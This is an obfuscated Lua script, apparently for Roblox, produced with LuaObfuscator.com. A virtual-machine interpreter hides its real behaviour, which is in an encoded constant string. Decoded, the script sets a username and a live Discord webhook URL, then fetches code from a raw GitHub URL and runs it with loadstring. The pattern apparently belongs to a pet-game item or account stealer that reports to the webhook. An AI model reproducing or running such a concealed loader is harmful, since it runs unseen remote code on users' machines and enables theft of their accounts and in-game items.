--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v70=0 -0 ;local v71;while true do if (v70==(0 -0)) then v71=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + (1701 -(1523 + 114))))^(((v33-((838 + 94) -((1221 -364) + 74))) -(v32-1)) + (569 -(367 + 201)))) ;return v71-(v71%(928 -(214 + 713))) ;end end else local v72=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v72 + v72))>=v72) and (1066 -(68 + 997))) or (877 -(282 + 595)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34=1270 -(226 + (1916 -872)) ;local v35;local v36;local v37;local v38;while true do if (v34==((350 -(87 + 263)) -0)) then v35,v36,v37,v38=v1(v16,v19,v19 + (120 -((212 -(67 + 113)) + 85)) );v19=v19 + 3 + 1 + 0 ;v34=1;end if (v34==(1 + 0)) then return (v38 * (16778173 -(892 + 65))) + (v37 * (156337 -90801)) + (v36 * (472 -216)) + v35 ;end end end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v39=0;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v39==3) then v46=nil;while true do local v77=0;while true do if (v77~=(1695 -(1229 + 466))) then else local v99=0;while true do if (0==v99) then if (v40~=(1024 -(706 + 318))) then else local v114=0;while true do if (v114~=1) then else v43={};v44={v41,v42,nil,v43};v114=2;end if (v114~=2) then else v40=1272 -(945 + 326) ;break;end if (v114==0) then local v142=0 -0 ;while true do if (1==v142) then v114=1;break;end if (v142==(0 -0)) then v41={};v42={};v142=1 + 0 ;end end end end end if (v40~=(701 -(271 + 429))) then else local v115=1262 -(1091 + 171) ;local v116;while true do if (v115==(0 + 0)) then v116=1500 -(1408 + 92) ;while true do if (v116==(1 + 0)) then local v158=0 -0 ;while true do if ((0 -0)~=v158) then else for v163=375 -(123 + 251) ,v45 do local v164=0 -0 ;local v165;local v166;local v167;local v168;while true do if (v164==(700 -(208 + 490))) then while true do if (v165~=(0 + 0)) then else local v174=0 + 0 ;while true do if (1==v174) then v165=1 + 0 ;break;end if (v174==(0 + 0)) then v166=0 + 0 ;v167=nil;v174=530 -(406 + 123) ;end end end if (v165==(1770 -(1749 + 20))) then v168=nil;while true do if (v166~=(0 + 0)) then else v167=v22();v168=nil;v166=1 + 0 ;end if (v166~=1) then else if (v167==(837 -(660 + 176))) then v168=v22()~=(0 + 0) ;elseif (v167==(1324 -(1249 + 73))) then v168=v25();elseif (v167==(205 -(14 + 188))) then v168=v26();end v46[v163]=v168;break;end end break;end end break;end if (v164~=(675 -(534 + 141))) then else v165=1145 -(466 + 679) ;v166=nil;v164=2 -1 ;end if (v164~=1) then else v167=nil;v168=nil;v164=5 -3 ;end end end v44[2 + 1 ]=v22();v158=1;end if (v158~=(1 + 0)) then else v116=2 + 0 ;break;end end end if (v116~=(0 -0)) then else v45=v24();v46={};v116=1 -0 ;end if (v116~=(5 -3)) then else v40=2;break;end end break;end end end v99=585 -(57 + 527) ;end if (v99==(1428 -(41 + 1386))) then v77=1;break;end end end if (v77~=(104 -(17 + 86))) then else if (v40~=2) then else for v106=1,v24() do local v107=0 + 0 ;local v108;local v109;local v110;local v111;while true do if (v107~=(0 + 0)) then else v108=0 -0 ;v109=nil;v107=167 -(122 + 44) ;end if (v107~=(1 -0)) then else v110=nil;v111=nil;v107=398 -(115 + 281) ;end if (v107==2) then while true do if (v108==(1 + 0)) then v111=nil;while true do if (v109~=(2 -1)) then else while true do if (v110~=(0 -0)) then else v111=v22();if (v21(v111,1,66 -(30 + 35) )==(0 + 0)) then local v169=0 + 0 ;local v170;local v171;local v172;local v173;while true do if (v169~=2) then else while true do if (v170~=(4 -2)) then else local v175=1257 -(1043 + 214) ;while true do if ((3 -2)~=v175) then else v170=870 -(550 + 317) ;break;end if (v175~=0) then else if (v21(v172,1 -0 ,1)==(1 -0)) then v173[5 -3 ]=v46[v173[287 -(134 + 151) ]];end if (v21(v172,1667 -(970 + 695) ,3 -1 )==(1991 -(582 + 1408))) then v173[583 -(361 + 219) ]=v46[v173[323 -(53 + 267) ]];end v175=3 -2 ;end end end if (v170==(1 -0)) then local v176=0 -0 ;while true do if (v176~=(1825 -(1195 + 629))) then else v170=2;break;end if (v176~=(0 -0)) then else v173={v23(),v23(),nil,nil};if (v171==0) then local v185=0 -0 ;while true do if (v185~=(780 -(162 + 618))) then else v173[2 + 1 ]=v23();v173[3 + 1 ]=v23();break;end end elseif (v171==(1 + 0)) then v173[3]=v24();elseif (v171==(2 + 0)) then v173[129 -(116 + 10) ]=v24() -((3 -1)^16) ;elseif (v171==3) then local v190=0 + 0 ;local v191;local v192;local v193;while true do if ((1 -0)~=v190) then else v193=nil;while true do if (v191~=(1 -0)) then else while true do if (0==v192) then v193=0 + 0 ;while true do if (v193~=0) then else v173[1639 -(1373 + 263) ]=v24() -((1002 -(451 + 549))^(6 + 10)) ;v173[4]=v23();break;end end break;end end break;end if (v191~=(0 + 0)) then else v192=0 -0 ;v193=nil;v191=1 -0 ;end end break;end if (v190==(0 -0)) then v191=1384 -(746 + 638) ;v192=nil;v190=1;end end end v176=1 + 0 ;end end end if ((4 -1)==v170) then if (v21(v172,1124 -(118 + 1003) ,3)~=(2 -1)) then else v173[345 -(218 + 123) ]=v46[v173[381 -(142 + 235) ]];end v41[v106]=v173;break;end if (v170==(1581 -(1535 + 46))) then v171=v21(v111,9 -7 ,3 + 0 );v172=v21(v111,981 -(553 + 424) ,1 + 5 );v170=1;end end break;end if (v169==(561 -(306 + 254))) then v172=nil;v173=nil;v169=1 + 1 ;end if (v169~=0) then else v170=0;v171=nil;v169=1 + 0 ;end end end break;end end break;end if (v109==(0 -0)) then local v161=1467 -(899 + 568) ;while true do if (v161~=(1 + 0)) then else v109=2 -1 ;break;end if (v161==(603 -(268 + 335))) then v110=0 -0 ;v111=nil;v161=1;end end end end break;end if (v108==0) then local v148=0;while true do if ((0 -0)~=v148) then else v109=0;v110=nil;v148=291 -(60 + 230) ;end if (v148~=1) then else v108=573 -(426 + 146) ;break;end end end end break;end end end for v112=1,v24() do v42[v112-(4 -3) ]=v29();end return v44;end break;end end end break;end if (v39~=(1 + 0)) then else v42=nil;v43=nil;v39=1458 -(282 + 1174) ;end if (v39~=(811 -(569 + 242))) then else v40=0 + 0 ;v41=nil;v39=1;end if (v39==(5 -3)) then v44=nil;v45=nil;v39=3 + 0 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=v24();local v48=v24();local v49=1 + 0 ;local v50=(v21(v48,2 -1 ,(770 + 452) -(373 + 829) ) * (2^((560 + 203) -(476 + 255)))) + v47 ;local v51=v21(v48,1151 -(369 + 761) ,18 + (34 -21) );local v52=((v21(v48,57 -25 )==1) and  -(1 -(1933 -(565 + 1368)))) or (239 -((240 -176) + 174)) ;if (v51==(0 + 0)) then if (v50==(0 -(1661 -(1477 + 184)))) then return v52 * 0 ;else local v78=336 -(144 + 192) ;while true do if (v78==0) then v51=217 -(42 + 174) ;v49=0;break;end end end elseif (v51==(1538 + 509)) then return ((v50==(0 + 0)) and (v52 * ((1 + 0)/0))) or (v52 * NaN) ;end return v8(v52,v51-((1889 + 638) -(363 + 1141)) ) * (v49 + (v50/(((3557 -(1913 + 62)) -(1183 + 397))^(158 -106)))) ;end v26=nil;function v26(v53)local v54=0;local v55;local v56;while true do if (v54==(1 + (1125 -(936 + 189)))) then v55=v3(v16,v19,(v19 + v53) -(857 -(564 + 292)) );v19=v19 + v53 ;v54=2 -0 ;end if (v54==(5 -3)) then v56={};for v79=305 -(244 + 60) , #v55 do v56[v79]=v2(v1(v3(v55,v79,v79)));end v54=3 + 0 ;end if ((476 -(14 + 27 + 435))==v54) then v55=nil;if  not v53 then v53=v24();if (v53==(1001 -(938 + 63))) then return "";end end v54=1 + 0 ;end if (v54==(1616 -(1565 + 48))) then return v6(v56);end end end v18=5;end if (v18==2) then function v22()local v57=0;local v58;while true do if (v57==(1 + (0 -0))) then return v58;end if (v57==(1138 -(782 + 356))) then v58=v1(v16,v19,v19);v19=v19 + (268 -(176 + 91)) ;v57=2 -1 ;end end end v23=nil;function v23()local v59=1092 -(975 + (1135 -(697 + 321))) ;local v60;local v61;while true do if ((1875 -(157 + (4679 -2961)))==v59) then v60,v61=v1(v16,v19,v19 + 2 );v19=v19 + 2 + 0 ;v59=3 -2 ;end if (v59==(3 -2)) then return (v61 * 256) + v60 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v62)if (v1(v62,2)==79) then v20=v0(v3(v62,1,1));return "";else local v73=v2(v0(v62,16));if v20 then local v81=0;local v82;while true do if (v81==0) then v82=v5(v73,v20);v20=nil;v81=1;end if (v81==1) then return v82;end end else return v73;end end end);v18=1;end if (v18==7) then function v30(v63,v64,v65)local v66=0;local v67;local v68;local v69;while true do if (v66==1) then v69=v63[3];return function(...)local v83=v67;local v84=v68;local v85=v69;local v86=v28;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v97=0,v91 do if (v97>=v85) then v89[v97-v85 ]=v90[v97 + 1 ];else v93[v97]=v90[v97 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do local v98=0;while true do if (v98==0) then v95=v83[v87];v96=v95[1];v98=1;end if (v98==1) then if (v96<=3) then if (v96<=1) then if (v96>0) then v93[v95[2]]=v65[v95[3]];else local v119=0;local v120;local v121;while true do if (v119==1) then v93[v120 + 1 ]=v121;v93[v120]=v121[v95[4]];break;end if (v119==0) then v120=v95[2];v121=v93[v95[3]];v119=1;end end end elseif (v96==2) then local v122=v95[2];local v123,v124=v86(v93[v122](v13(v93,v122 + 1 ,v95[3])));v88=(v124 + v122) -1 ;local v125=0;for v143=v122,v88 do local v144=0;while true do if (v144==0) then v125=v125 + 1 ;v93[v143]=v123[v125];break;end end end else do return;end end elseif (v96<=5) then if (v96>4) then local v126;local v127,v128;local v129;local v130;v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v65[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v65[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v65[v95[3]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v65[v95[3]];v87=v87 + 1 ;v95=v83[v87];v130=v95[2];v129=v93[v95[3]];v93[v130 + 1 ]=v129;v93[v130]=v129[v95[4]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v130=v95[2];v127,v128=v86(v93[v130](v13(v93,v130 + 1 ,v95[3])));v88=(v128 + v130) -1 ;v126=0;for v145=v130,v88 do v126=v126 + 1 ;v93[v145]=v127[v126];end v87=v87 + 1 ;v95=v83[v87];v130=v95[2];v93[v130]=v93[v130](v13(v93,v130 + 1 ,v88));else v93[v95[2]]=v95[3];end elseif (v96<=6) then v93[v95[2]]();elseif (v96>7) then v65[v95[3]]=v93[v95[2]];else local v151=v95[2];v93[v151]=v93[v151](v13(v93,v151 + 1 ,v88));end v87=v87 + 1 ;break;end end end end;end if (v66==0) then v67=v63[1];v68=v63[2];v66=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!083O0003063O00557365724944030D3O00446F547361726A6179322O303603083O00576562482O6F6B7303793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31302O39373635373238363430342O393734322F2O48633833306D544F4B3253346331536A437958414B726C76486A433355584B43444F2O465667376F304C38333441396336695649666C6F72456E50354856524D753370030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7065742D73696D782F72692O7A6875622F6D61696E2F4E6577000C3O0012053O00023O00124O00013O00124O00043O00124O00033O00124O00053O00122O000100063O00202O00010001000700122O000300086O000100039O0000022O00063O000100012O00033O00017O00",v9(),...);end
